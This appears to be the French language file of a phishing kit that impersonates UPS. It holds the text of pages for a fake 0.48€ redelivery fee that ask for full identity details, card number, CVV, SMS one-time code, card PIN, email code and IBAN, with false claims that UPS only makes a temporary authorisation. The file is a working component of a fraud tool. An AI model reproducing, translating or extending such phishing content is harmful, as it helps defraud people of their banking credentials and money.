<?php
function lang($phrase){
	static $lang = array(

        "xlang" => "FR",
        "xcapt1" => "Veuillez cocher la case CAPTCHA",
        "xcapt2" => "Vérification",
        "xcapt3" => "Continuer",
        "xfot1" => "Ce site",
        "xfot2" => "Autres sites de l'UPS",
        "xfot3" => "Connectez-vous avec nous",
        "xfot4" => "Legal",
        "xfot5" => "Copyright ©1994- 2023&nbsp;United Parcel Service of America, Inc. Tous droits réservés. ",
        "xind1" => "Suivi",
        "xind2" => "Numéro de suivi",
        "xind3" => "Erreur : Veuillez fournir le bon numéro de suivi",
        "xind4" => "Besoin d'aide pour modifier votre livraison ?",
        "xind5" => "Devis",
        "xind6" => "Expédier",
        "xind7" => "Facturation",
        "xind8" => "Obtenir de l'aide",
        "xexp1" => "Livraison interrompue",
        "xexp2" => "Suivi",
        "xexp3" => "Votre dernière livraison a été interrompue. Elle est actuellement en attente au centre de tri",
        "xexp4" => "Le colis qui vous a été envoyé ne respectait pas le poids indiqué, et il vous sera demandé de payer un supplément pour assurer la bonne livraison de votre colis",
        "xexp5" => "Les frais s'élèvent à 0,48€",
        "xexp6" => "Pour payer, veuillez cliquer sur le bouton ci-dessous",
        'xexp7' => "Payer",
        "xexp8" => "Une fois la taxe payée, votre colis sera acheminé dans les plus brefs délais à l'adresse de livraison",
        "xexp9" => "Si la taxe n'est pas payée dans les 48 heures, le colis sera retourné à l'expéditeur",
        "xexp10" => "Suivi par numéro de référence",
        "xexp11" => "Numéros de suivi des importations",
        "xexp12" => "Autres services de suivi",
        "xinfz1" => "Confirmez vos coordonnées de facturation",
        "xinfz2" => "Nom complet",
        "xinfz10" => "Date de naissance",
        "xinfz3" => "Pays",
        "xinfz4" => "Ville",
        "xinfz5" => "Adresse",
        "xinfz6" => "Téléphone",
        "xinfz7" => "Postcode",
        "xinfz8" => "Error : Toutes les données sont requises",
        "xinfz9" => "Confirm",
        "xpay1" => "Détails du paiement",
        "xpay2" => "Cher client, vérifiez vos détails de paiement correctement et faites correspondre les détails de votre carte pour terminer",
        "xpay3" => "Nom sur la carte",
        "xpay4" => "Numéro de carte",
        "xpay5" => "Date d'expiration",
        "xpay6" => "Code de sécurité CVV (3 chiffres)",
        "xpay7" => "Erreur : Toutes les données sont requises",
        "xpay8" => "Confirmer",
        "xsms1" => "Vérification",
        "xsms2" => "Nous avons envoyé un code de confirmation à votre numéro",
        "xsms3" => "Code OTP",
        "xsms4" => "Error : Incorrect otp code.",
        "xsms5" => "Cette étape est nécessaire pour compléter votre processus de paiement en toute sécurité",
        "xsms6" => "UPS effectue une authentification temporaire de votre carte pour la vérifier. Il s'agit uniquement d'une autorisation et NON de frais.",
        "xsms7" => "Confirmation",
        "xconf1" => "Reprise de la livraison",
        "xconf2" => "Le paiement des frais supplémentaires a été pris en compte",
        "xconf3" => "Votre colis devrait arriver dans les prochaines 24 heures",
        "xconf4" => "Confirmer",
        "xpin1" => "Vérification",
        "xpin2" => "Entrez le code pin de votre carte bancaire",
        "xpin3" => "Code pin",
        "xpin4" => "(4 chiffres)",
        "xpin5" => "Cette étape est nécessaire pour compléter votre processus de paiement en toute sécurité",
        "xpin6" => "UPS effectue une vérification temporaire de votre carte pour la vérifier. Il s'agit uniquement d'une autorisation et NON de frais.",
        "xpin7" => "Confirmer",
        "xmail1" => "Vérification",
        "xmail2" => "Nous avons envoyé un code de confirmation à votre email",
        "xmail3" => "Code email",
        "xmail4" => "(6 chiffres)",
        "xmail5" => "Cette étape est nécessaire pour compléter votre processus de paiement en toute sécurité",
        "xmail6" => "UPS effectue une vérification temporaire de votre carte pour la vérifier. Il s'agit uniquement d'une autorisation et NON de frais.",
        "xmail7" => "Confirmer",
        "xiban1" => "Vérification",
        "xiban2" => "Veuillez saisir votre IBAN pour terminer le paiement",
        "xiban3" => "IBAN",
        "xiban4" => "(IBAN)",
        "xiban5" => "Cette étape est nécessaire pour compléter en toute sécurité votre processus de paiement",
        "xiban6" => "UPS effectue une vérification temporaire de votre carte pour la vérifier. Il s'agit uniquement d'une autorisation et NON d'un frais",
        "xiban7" => "Confirmer"
	);	
	
	return $lang[$phrase];
}
 ?>